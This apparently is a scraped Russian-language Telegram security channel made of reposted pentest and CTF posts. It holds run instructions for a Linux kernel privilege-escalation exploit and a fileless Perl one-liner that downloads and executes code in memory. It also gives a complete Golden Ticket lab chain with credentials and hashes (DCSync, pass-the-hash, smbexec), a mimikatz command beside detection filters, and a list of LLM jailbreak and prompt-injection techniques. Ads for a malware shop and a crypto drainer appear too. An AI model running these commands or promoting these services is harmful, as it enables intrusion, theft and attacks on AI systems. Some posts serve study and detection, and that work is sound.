Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE
➡️ Github PoC
🌚 @poxek
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2🔥2
Forwarded from wr3dmast3r vs pentest
Если тебе всё ещё интересен экзамен академии PortSwigger, то я выпустил исправленную версию своей работы и рассказал немного о себе 😳
Подробнее
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
BSCP — разгадываем тайны сертификации от академии PortSwigger
Привет, Хабр! Меня зовут Никита, я пентестер, специализируюсь на веб-тестировании. Наверняка многие из вас задумывались о подтверждении своей экспертизы с помощью некоторых сертификаций. Сегодня хочу...
🔥5🎉2🍓2🍾1
Forwarded from Purple Chronicles (ELK Enjoyer)
🎫Немного о Golden Ticket🎫
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩💻 :
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
После обновления выпустить золотой билет можно следующей командой:
При этом обратная совместимость со старым PAC так же останется:
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4
# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt
# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute
# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova
# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts
# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи
amaslova
!Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2🍌2🤯1
Forwarded from Purple Chronicles (ELK Enjoyer)
😈5❤🔥4
Forwarded from PWN AI (Artyom Semenov)
https://github.com/prompt-security/ps-fuzz
Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:
Это список атак, которые он пытается реализовать:
Jailbreak:
AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion
Prompt Injection:
Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack
System prompt extraction:
System Prompt Stealer
Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:
Это список атак, которые он пытается реализовать:
Jailbreak:
AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion
Prompt Injection:
Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack
System prompt extraction:
System Prompt Stealer
❤3😱3🤯2
🔓 Сила шифрования или как я выявил недостаток работы Defender’а 🔓
В данной статье рассмотрим, как технологии шифрования помогают в защите конфиденциальности и целостности данных, а также как современные средства безопасности могут оказаться недостаточными для полноценный защиты.
Читать: https://teletype.in/@hackerblog/PtB5Fw2oQbX
UPD: Ура-ура! Наконец, я закончил, наверное, самый трудозатратный ресёрч на канале, который занял у меня 3 месяца. Посты теперь будут выходить чаще.
В данной статье рассмотрим, как технологии шифрования помогают в защите конфиденциальности и целостности данных, а также как современные средства безопасности могут оказаться недостаточными для полноценный защиты.
Читать: https://teletype.in/@hackerblog/PtB5Fw2oQbX
UPD: Ура-ура! Наконец, я закончил, наверное, самый трудозатратный ресёрч на канале, который занял у меня 3 месяца. Посты теперь будут выходить чаще.
Teletype
Сила шифрования или как я выявил недостаток работы Defender’а
Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!
❤8🤯4⚡3
Кстати, эта вулна встречается в одном из тасков на Codeby🛤️
Forwarded from Exploit Service
Proof of Concept (PoC) for #CVE-2024-23334, demonstrating how #malicious actors can exploit vulnerabilities in aiohttp using #LFI .
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
GitHub
GitHub - jhonnybonny/CVE-2024-23334: aiohttp LFI (CVE-2024-23334)
aiohttp LFI (CVE-2024-23334). Contribute to jhonnybonny/CVE-2024-23334 development by creating an account on GitHub.
❤4❤🔥1
🔑 Немножко про Pass-the-Hash со стороны защиты 🔑
Данная активность в сети, конечно, оставит свои следы. Такие сработки правил, как: Windows_Hacktool_Usage, MalSecLogon_PPID_Spoofing и Pass_the_Hash прекрасно отработают на вышеописанную деятельность.
Теперь поподробнее:
Pass_the_Hash
Пользователь "администратор" выполнил локальную атаку Pass-the-Hash на узле computer-1.stend.domain, чтобы повысить привилегии. Атакующий использовал NTLM-хеш пользователя pudge.
Фильтр для поиска событий:
MalSecLogon_PPID_Spoofing
Пользователь "администратор", возможно, использовал технику подмены идентификатора родительского процесса (PPID Spoofing) и создал процесс cmd.exe от процесса mimikatz.exe на узле computer-1.stend.domain.
Фильтр для поиска событий:
Windows_Hacktool_Usage
Обнаружено использование утилит для взлома (mimikatz.exe) систем Windows на узле computer-1.stend.domain.
Фильтр для поиска событий:
sekurlsa::pth /user:pudge /domain:stend.domain /ntlm:<>
На приведенном ниже изображении можно увидеть успешно проведенную атаку PTH c использованием утилиты mimikatz и, как следствие, запуск командной строки из-под пользователя “Администратор”. Данная активность в сети, конечно, оставит свои следы. Такие сработки правил, как: Windows_Hacktool_Usage, MalSecLogon_PPID_Spoofing и Pass_the_Hash прекрасно отработают на вышеописанную деятельность.
Теперь поподробнее:
Pass_the_Hash
Пользователь "администратор" выполнил локальную атаку Pass-the-Hash на узле computer-1.stend.domain, чтобы повысить привилегии. Атакующий использовал NTLM-хеш пользователя pudge.
Фильтр для поиска событий:
((((object = "account") AND (action = "elevate")) AND (logon_type = 9)) AND (msgid = "4624")) AND (logon_service = "seclogo")
MalSecLogon_PPID_Spoofing
Пользователь "администратор", возможно, использовал технику подмены идентификатора родительского процесса (PPID Spoofing) и создал процесс cmd.exe от процесса mimikatz.exe на узле computer-1.stend.domain.
Фильтр для поиска событий:
(object.process.name = "mimikatz.exe" OR object.name = "mimikatz.exe") AND (msgid = "1")
Windows_Hacktool_Usage
Обнаружено использование утилит для взлома (mimikatz.exe) систем Windows на узле computer-1.stend.domain.
Фильтр для поиска событий:
(object.process.name = "mimikatz.exe" OR object.name = "mimikatz.exe") AND (msgid = "1")
❤3❤🔥1👍1
Forwarded from PurpleBear (Vadim Shelest)
Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку:
☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent
Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎
☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent
Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎
GitHub
GitHub - madhuakula/kubernetes-goat: Kubernetes Goat is a "Vulnerable by Design" cluster environment to learn and practice Kubernetes…
Kubernetes Goat is a "Vulnerable by Design" cluster environment to learn and practice Kubernetes security using an interactive hands-on playground 🚀 - madhuakula/kubernetes-goat
❤3👍2🔥2❤🔥1
Посты будут выходить реже до конца июля😢
Сессия, сами понимаете 🥹
Сессия, сами понимаете 🥹
😢8🙏4🕊3❤🔥1😁1
Forwarded from wr3dmast3r vs pentest
Знакомимся с DOOM DOM Invader, или как найти DOM-XSS на Habr во время написания статьи 😔
Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода🖼️
Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость👀
Подробнее
Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода
Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Осваиваем DOM Invader: ищем DOM XSS и Prototype Pollution на примере пяти лабораторных и одной уязвимости на Хабре
Привет, Хабр! Сегодня мы познакомимся с DOM XSS и Prototype Pollution, рассмотрим примеры уязвимостей на Bug Bounty и научимся использовать инструмент DOM Invader, который заметно упростит поиск таких...
❤5
Forwarded from Exploit Service
CVE-2024-27804
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
https://github.com/R00tkitSMM/CVE-2024-27804
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupport
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
https://github.com/R00tkitSMM/CVE-2024-27804
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupport
❤3🔥1
HackOsint 2024 by EXE.1sior.pdf
50 MB
Кстати, совсем недавно проходил Hackosint (CTF по осинту)
Ребята из нашей команды заняли 1 место😎
🎉🎊Поздравим их🎉🎊
P.S. Прикреплю сюда райтапы на таски, поскольку они были очень необычные и интересные
Ребята из нашей команды заняли 1 место😎
🎉🎊Поздравим их🎉🎊
P.S. Прикреплю сюда райтапы на таски, поскольку они были очень необычные и интересные
❤10👍2
Forwarded from Vault of DevOps
! upd
Здарова всем, там race condition по sshd;
Скрипт проверки:
https://github.com/xaitax/CVE-2024-6387_Check
Идея проверки, проверяется версия удаленного сервера, уязвимые версии:
Сам PoC к уязвимости, был написан на С, на x32 систем, для х64 пока нет, но думаю что вопрос времени;
Пока есть три варианта, митингации (но можно таким образом вызвать отказ в обслуивании):
И пропатчить бинарь из portable версии sshd (чет мне не очень этот вариант нравится);
Третий вариант, обновить пакеты:
openssh-server
openssh-client
openssh-sftp-server
До версии 9.8p1 *
Задетектить атаку можно, по логам sshd (journalctl -t sshd), будут сообщения вроде (Timeout before authentication);
Здарова всем, там race condition по sshd;
Скрипт проверки:
https://github.com/xaitax/CVE-2024-6387_Check
Идея проверки, проверяется версия удаленного сервера, уязвимые версии:
'SSH-2.0-OpenSSH_8.5p1'
'SSH-2.0-OpenSSH_8.6p1'
'SSH-2.0-OpenSSH_8.7p1'
'SSH-2.0-OpenSSH_8.8p1'
'SSH-2.0-OpenSSH_8.9p1'
'SSH-2.0-OpenSSH_9.0p1'
'SSH-2.0-OpenSSH_9.1p1'
'SSH-2.0-OpenSSH_9.2p1'
'SSH-2.0-OpenSSH_9.3p1'
'SSH-2.0-OpenSSH_9.4p1'
'SSH-2.0-OpenSSH_9.5p1'
'SSH-2.0-OpenSSH_9.6p1'
'SSH-2.0-OpenSSH_9.7p1'
Сам PoC к уязвимости, был написан на С, на x32 систем, для х64 пока нет, но думаю что вопрос времени;
Пока есть три варианта, митингации (но можно таким образом вызвать отказ в обслуивании):
LoginGraceTime=0
И пропатчить бинарь из portable версии sshd (чет мне не очень этот вариант нравится);
Третий вариант, обновить пакеты:
openssh-server
openssh-client
openssh-sftp-server
До версии 9.8p1 *
Задетектить атаку можно, по логам sshd (journalctl -t sshd), будут сообщения вроде (Timeout before authentication);
🤯5👍1